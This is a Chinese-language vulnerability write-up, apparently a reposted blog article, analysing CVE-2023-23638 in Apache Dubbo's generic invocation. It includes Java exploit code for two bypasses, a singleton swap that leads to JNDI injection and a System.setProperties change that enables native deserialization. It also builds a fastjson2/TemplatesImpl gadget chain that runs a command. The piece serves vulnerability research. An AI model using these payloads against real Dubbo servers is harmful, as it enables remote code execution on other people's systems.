在对Apache dubbo 的CVE-2023-23638漏洞分析的过程中，通过对师傅们对这个漏洞的学习和整理，再结合了一些新学的技巧运用，从而把这个漏洞的利用向前推了一步。整个过程中的研究思路以及遇到问题并解决问题的过程，我觉得值得分享，所以写下此文记录。

Apache Dubbo 是一款易用、高性能的WEB 和RPC 框架，同时为构建企业级微服务提供服务发现、流量治理、可观测、认证鉴权等能力、工具与最佳实践。

该漏洞核心原理是利用dubbo的泛化调用功能，反序列化任意类，从而造成反序列化攻击。这个漏洞影响Apache Dubbo 2.7.x，2.7.21及之前版本； Apache Dubbo 3.0.x 版本，3.0.13 及之前版本； Apache Dubbo 3.1.x 版本，3.1.5 及之前的版本。

在普通的Dubbo方法调用过程中，客户端需要环境中存在被调用类的接口，才能正常继续调用。泛化调用则是指在客户端在没有服务方提供的 API（SDK）的情况下，对服务方进行调用，并且可以正常拿到调用结果。 详细的泛化调用说明可以见：
https://cn.dubbo.apache.org/zh-cn/overview/tasks/develop/generic/。

既然是泛化调用，那就代表用户可以在Dubbo服务端传入任意类。也正是因为这个功能，给Dubbo带来了一些漏洞，在CVE-2021-30179中，由于这个功能没有对传入的类做任何的限制，导致攻击者可以通过传入恶意的类，并调用其特定方法，导致代码执行。后续Dubbo在代码层面对传入的类进行了限制，从而防御攻击者传入恶意的类进行RCE，而这个防御，在CVE-2023-23638中被绕过，也就是本篇文章所要讲述的内容。

Dubbo处理泛化调用请求的核心类是
org.apache.dubbo.rpc.filter.GenericFilter，在这个filter的invoke方法中，对客户端的调用进行了判断，同时根据服务端的配置进入不同的反序列化逻辑。用户进行泛化调用时可以传入一个hashmap，当map中存在generic-raw.return这组键值对时，GenericFilter就会进入PojoUtils.realize()方法，把用户传入的类进行实例化，并对实例化后对象的属性进行赋值。

CVE-2021-30179的补丁打在了类初始化的时候：

else if (pojo instanceof Map && type != null) {
  Object className = ((Map)pojo).get("class");
  if (className instanceof String) {
      SerializeClassChecker.getInstance().validateClass((String)className);
      if (!CLASS_NOT_FOUND_CACHE.containsKey(className)) {
          try {
              type = ClassUtils.forName((String)className);
          } catch (ClassNotFoundException var22) {
              CLASS_NOT_FOUND_CACHE.put((String)className, NOT_FOUND_VALUE);
          }
      }
  }

通过调用
SerializeClassChecker.getInstance().validateClass((String)className);对传入的类进行黑名单过滤，过滤结束后使用ClassUtils.forName((String)className);获取类，后续会调用class.newInstance()进行类的实例化，最后通过如下代码进行对象的属性赋值：

if (value != null) {
    Method method = getSetterMethod(dest.getClass(), name, value.getClass());
    Field field = getField(dest.getClass(), name);
    if (method != null) {
        if (!method.isAccessible()) {
            method.setAccessible(true);
        }

        Type ptype = method.getGenericParameterTypes()[0];
        value = realize0(value, method.getParameterTypes()[0], ptype, history);

        try {
            method.invoke(dest, value);
        } catch (Exception var20) {
            String exceptionDescription = "Failed to set pojo " + dest.getClass().getSimpleName() + " property " + name + " value " + value.getClass() + ", cause: " + var20.getMessage();
            logger.error("0-8", "", "", exceptionDescription, var20);
            throw new RuntimeException(exceptionDescription, var20);
        }
    } else if (field != null) {
        value = realize0(value, field.getType(), field.getGenericType(), history);

        try {
            field.set(dest, value);
        } catch (IllegalAccessException var19) {
            throw new RuntimeException("Failed to set field " + name + " of pojo " + dest.getClass().getName() + " : " + var19.getMessage(), var19);
        }
    }
}

程序会先尝试先获取类属性的set方法，如果目标类存在这个set方法，那么会利用method.invoke进行执行。如果没有set方法，那么会通过反射获取类的目标属性，然后调用field.set进行赋值。

也就是说，泛化调用对于用户提供了如下的代码执行点：

我们可以传入任意的非黑名单类，然后调用这个类的public或者private无参构造方法，然后可以调用这个生成的Object的任意set+METHOD_NAME方法，要求参数有且仅有一个，或者利用object.field.set方法对这个object的任意属性赋值。

这个漏洞存在两种利用方式，对应了dubbo提供的两种赋值的方法。

利用方式1

利用object.field.set进行利用。

Dubbo在泛化调用中，对传入类进行黑名单过滤的具体代码在
org.apache.dubbo.common.utils.PojoUtils#realize0，使用SerializeClassChecker的validateClass方法进行过滤。

Object className = ((Map)pojo).get("class");
if (className instanceof String) {
    SerializeClassChecker.getInstance().validateClass((String)className);
    if (!CLASS_NOT_FOUND_CACHE.containsKey(className)) {
        try {
            type = ClassUtils.forName((String)className);
        } catch (ClassNotFoundException var22) {
            CLASS_NOT_FOUND_CACHE.put((String)className, NOT_FOUND_VALUE);
        }
    }
}

validateClass方法内容如下：

public boolean validateClass(String name, boolean failOnError) {
    if (!this.OPEN_CHECK_CLASS) {
        return true;
    } else {
      ...

这个方法首先会对SerializeClassChecker的OPEN_CHECK_CLASS属性进行判断，如果这个属性为false，那么就不会对传入类进行检查，直接返回。再看getInstance方法：

public static SerializeClassChecker getInstance() {
    if (INSTANCE == null) {
        Class var0 = SerializeClassChecker.class;
        synchronized(SerializeClassChecker.class) {
            if (INSTANCE == null) {
                INSTANCE = new SerializeClassChecker();
            }
        }
    }

    return INSTANCE;
}

这是一个典型的单例模式的写法。因此如果我们可以替换掉这个INSTANCE对象，将它的OPEN_CHECK_CLASS属性置为false，那么就可以绕过黑名单类的检查，之后就可以使用类似CVE-2021-30179的POC进行代码执行。核心代码如下：

private static Map getInstance() throws IOException {
    HashMap newChecker = new HashMap();
    newChecker.put("class", "org.apache.dubbo.common.utils.SerializeClassChecker");
    newChecker.put("OPEN_CHECK_CLASS", false);
    HashMap map = new HashMap();
    map.put("class", "org.apache.dubbo.common.utils.SerializeClassChecker");
    map.put("INSTANCE", newChecker);
    LinkedHashMap map2 = new LinkedHashMap();
    map2.put("class", "com.sun.rowset.JdbcRowSetImpl");
    map2.put("DataSourceName", "ldap://127.0.0.1:1099/exp");
    map2.put("autoCommit", true);
    HashMap map3 = new HashMap();
    map3.put("class","java.util.HashMap");
    map3.put("1",map);
    map3.put("2",map2);
    return map3;
}

第一个newChecker，用于创建一个OPEN_CHECK_CLASS属性值为false的SerializeClassChecker的对象，第二个map，用于将newChecker传入到SerializeClassChecker的单例INSTACNE属性中。然后第三个map2，使用类似CVE-2021-30179的POC，创建一个
com.sun.rowset.JdbcRowSetImpl对象，然后dubbo会先后调用setDataSourceName和setAutoCommit，从而向我们指定的地址发起JNDI请求。需要注意这里map2需要设置为LinkedHashMap，否则在dubbo进行set调用时可能无法按照先setDataSourceName，再setAutoCommit的顺序执行。

利用方式2

利用object.set+METHOD_NAME进行利用。

dubbo在泛化调用的过程中是存在一个接口允许原生java反序列化的。但是这个接口默认不开启，同时会进行序列化的黑名单类检查。然而这个接口调用开关是可以被控制的，我们如果可以把它打开，那么这个漏洞就变成了一个原生的java反序列化漏洞，利用特定的gadget就可以RCE。可以使用
org.apache.dubbo.common.utils.ConfigUtils类，它存在一个setProperties方法，可以对PROPERTIES对象进行赋值，从而控制开关。但是我发现
org.apache.dubbo.common.utils.ConfigUtils的setProperties方法只在2.7.x版本的dubbo存在，3.0.x和3.1.x都是没有的。那有没有什么通用的方法呢？事实上，Dubbo的configuration也是可以通过java.lang.System类的props对象进行传入的。那么就可以直接调用System.setProperties方法，传入修改后的dubbo配置。代码如下：

private static Map getProperties() throws IOException {
    Properties properties = new Properties();
    properties.setProperty("dubbo.security.serialize.generic.native-java-enable","true");
    properties.setProperty("serialization.security.check","false");
    HashMap map = new HashMap();
    map.put("class", "java.lang.System");
    map.put("properties", properties);
    return map;
}

在这之后就可以使用类似如下的代码进行原生反序列化利用

out.writeObject(getEvilObject());
HashMap attachments = new HashMap();
attachments.put("generic", "nativejava");
out.writeObject(attachments);

上述两种方法，在公开的分析文章里，都存在着一些问题。方法1中最终的Sink点是JNDI注入，需要出网。方法2中最终需要依赖特定的Gadget，在之前的Dubbo的反序列化分析文章中，大家在Gadget选择时都会使用一些三方依赖进行漏洞利用，例如Rome、CommonsBeanutils1等。那Dubbo是否存在原生的Java反序列化链呢？

在Dubbo 3.1.x的版本中，新增了对Fastjson2的支持。恰好前段时间刚好看到有师傅发了fastjson库在原生Java反序列化中的利用。结论是fastjons小于1.2.48版本是可以使用，fastjson2全版本是通杀的。利用的原理是fastjson的JSONArray或者JSONObject在调用其toString方法时，会触发其包裹对象的get+METHOD_NAME方法。因此很容易想到可以包裹一个TemplatesImpl对象，通过调用其getOutputProperties方法，从而执行任意代码。

既然已经有了方法，那实现一下试试吧。关键代码如下：

public static Map getProperties() throws IOException {
    Properties properties = new Properties();
    properties.setProperty("dubbo.security.serialize.generic.native-java-enable","true");
    properties.setProperty("serialization.security.check","false");
    HashMap map = new HashMap();
    map.put("class", "java.lang.System");
    map.put("properties", properties);
    return map;
}

public static Object getObject() throws Exception{
    ClassPool pool = ClassPool.getDefault();
    CtClass clazz = pool.makeClass("a");
    CtClass superClass = pool.get(AbstractTranslet.class.getName());
    clazz.setSuperclass(superClass);
    CtConstructor constructor = new CtConstructor(new CtClass[]{},
            clazz);
    constructor.setBody("Runtime.getRuntime().exec(\"calc.exe\");");
    clazz.addConstructor(constructor);
    byte[][] bytes = new byte[][]{clazz.toBytecode()};
    TemplatesImpl templates = TemplatesImpl.class.newInstance();
    setValue(templates, "_bytecodes", bytes);
    setValue(templates, "_name", "test");
    setValue(templates, "_tfactory", null);
    JSONArray jsonArray = new JSONArray();
    jsonArray.add(templates);
    BadAttributeValueExpException val = new
            BadAttributeValueExpException(null);
    Field valfield = val.getClass().getDeclaredField("val");
    valfield.setAccessible(true);
    valfield.set(val, jsonArray);

    NativeJavaSerialization nativeJavaSerialization =new NativeJavaSerialization();
    UnsafeByteArrayOutputStream unsafeByteArrayOutputStream = new UnsafeByteArrayOutputStream();
    ObjectOutput o = nativeJavaSerialization.serialize(null,unsafeByteArrayOutputStream);
    o.writeObject(val);

    return unsafeByteArrayOutputStream.toByteArray();
}

send(getProperties());
send(getObject());

程序先通过System.setProperties修改目标的序列化配置，然后再发送恶意的序列化代码，指定目标执行一个Calc.exe程序。结果程序报错了，报错如下：

程序最前面和预期的一样，成功执行了Java原生反序列化，但是在反序列化的过程中，fastjson2的JSONWriter\$Context的类初始化时，在TzdbZoneRulesProvider的构造函数中报错了，其构造函数如下：

public TzdbZoneRulesProvider() {
    try {
        String libDir = System.getProperty("java.home") + File.separator + "lib";
        try (DataInputStream dis = new DataInputStream(
                 new BufferedInputStream(new FileInputStream(
                     new File(libDir, "tzdb.dat"))))) {
            load(dis);
        }
    } catch (Exception ex) {
        throw new ZoneRulesException("Unable to load TZDB time-zone rules", ex);
    }
}

可以看到，这个构造函数中会调用System.getProperty("java.home")，拼接进文件读取路径，从而去读取jre路径下的tzdb.dat，这是一个IANA提供的TimeZone数据库，维护着最新最全的全球时区相关基础数据。由于我们在反序列化前替换掉了目标服务的System类的props对象，因此，这里System.getProperty("java.home")就会返回null，从而导致报错。

这个问题如何解决呢？通过观察调用链，以及动态调试，我找到了解决方法。通过在TzdbZoneRulesProvider类的构造函数打断点。

注意到TzdbZoneRulesProvider的初始化是被ZoneRulesProvider的类初始化调用的。ZoneRulesProvider的相关代码如下：

可以看到在ZoneRulesProvider类的static代码块中调用的new TzdbZoneRulesProvider()。static块的代码在程序被运行起来后，之后最多加载一次。因此如果可以让这个ZoneRulesProvider类在我们执行攻击前被加载一次，那么我们在执行攻击时就不会再加载这块代码，也就不会报错了。

有了这个方法，第一时间就想到，dubbo 的泛化调用可以初始化并newIntance类，并且TzdbZoneRulesProvider是ZoneRulesProvider的子类，ZoneRulesProvider在newIntance时初始化其弗雷，从而调用传ZoneRulesProvider类的static代码。基于这个想法，构造如下代码：

private static Map getInstance() throws IOException {
    HashMap map = new HashMap();
    map.put("class", "java.time.zone.TzdbZoneRulesProvider");
    return map;
}

private static Map getProperties() throws IOException {
    Properties properties = new Properties();
    properties.setProperty("dubbo.security.serialize.generic.native-java-enable","true");
    properties.setProperty("serialization.security.check","false");
    HashMap map = new HashMap();
    map.put("class", "java.lang.System");
    map.put("properties", properties);
    return map;
}

分成两步发送，最后发送序列化poc，即可完成代码执行。

• https://paper.seebug.org/2055/
• https://xz.aliyun.com/t/12333

from: https://xz.aliyun.com/t/12396